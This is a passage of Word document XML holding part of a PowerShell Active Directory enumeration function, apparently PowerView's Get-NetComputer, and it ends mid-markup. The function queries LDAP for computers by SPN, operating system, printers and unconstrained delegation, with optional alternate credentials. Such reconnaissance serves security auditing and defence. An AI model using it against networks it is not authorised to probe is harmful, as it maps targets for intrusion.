    <w:p w14:paraId="4EF60B4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="501BE981" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D9C89D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12F20535" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Switch. Ping each host to ensure it's up before enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BE7162" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A10A01B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADB0E09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="40B6747E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return full computer objects instead of just system names (the default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329FDE1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A18DE4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714C254" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="226FFD9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for computers, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D61357F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="554E0B39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E116B7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D5575D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0295EA36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C46C2E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AFF4FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66562297" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1179D9CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4F98C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76061732" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SiteName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4C0DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B57C71C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The AD Site name to search for computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017E5B70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67867821" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Unconstrained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB7CC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FAECE16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return computer objects that have unconstrained delegation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024FC21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05E96B8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CF2FAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3564CF93" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777BF811" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69E890D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A08B0D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A740450" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD6485B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA295FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A60D6F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50238338" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D6DCBBD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E0E0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DD838E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the current computers in current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620CA40B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="19FE2273" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457C5132" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D43C693" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer -SPN mssql*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C25E652" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501A75E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all MS SQL servers on the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E70E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CBD3643" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D78FF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05BAD897" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer -Domain testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13D4DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDA5BCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the current computers in 'testing' domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0700E427" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="483D5860" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74743B28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A0E5708" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer -Domain testing -FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032D9E29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08192C9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Returns full computer objects in the 'testing' domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D152D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2163B75F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E87B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56282C0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        https://github.com/darkoperator/Posh-SecMod/blob/master/Audit/Audit.psm1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2EC2A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDF834" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E57A893" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EAE665" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Param (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595861D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446BCB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C2521B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D4B472" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = '*',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B3CB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57F47D36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597466D1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SPN,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619956D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52A533B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD1958" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OperatingSystem,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F820B1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7AF0BEE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D7C729" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ServicePack,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71002876" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E1D3C64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A2A192" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Filter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D1E54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C215084" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A7CD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Printers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143345DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E0B93A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2BAD14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Ping,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9BC270" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="557F2B5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF5F1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FullData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E0843A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="343D4A63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B7CFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D64177" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="649A2002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CAEC42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6594D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="502C90B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8FA6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6BECAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0663BB30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B10CA19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SiteName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E25FAA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="620C81EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E1249C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Unconstrained,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C464167" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E47BFE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319985DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B148AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513DE312" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E3D1BA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195AC803" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB7D59C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098A9632" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24B0AB72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ADFF7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # so this isn't repeated if multiple computer names are passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F5EC3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CompSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52533E73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F92EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45045D12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5373669C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D345E2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($CompSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D55E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73A4BD21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're checking for unconstrained delegation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F888C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Unconstrained) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A3585E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Searching for computers with for unconstrained delegation"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4381B21D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619AE391" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E191423" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # set the filters for the seracher if it exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732629C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Printers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1C9CF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Searching for printers"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BD9C7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # $CompSearcher.filter="(&amp;(objectCategory=printQueue)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432990E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Filter += "(objectCategory=printQueue)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA89C73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B86B9E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($SPN) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A968964" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Searching for computers with SPN: $SPN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C219D30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
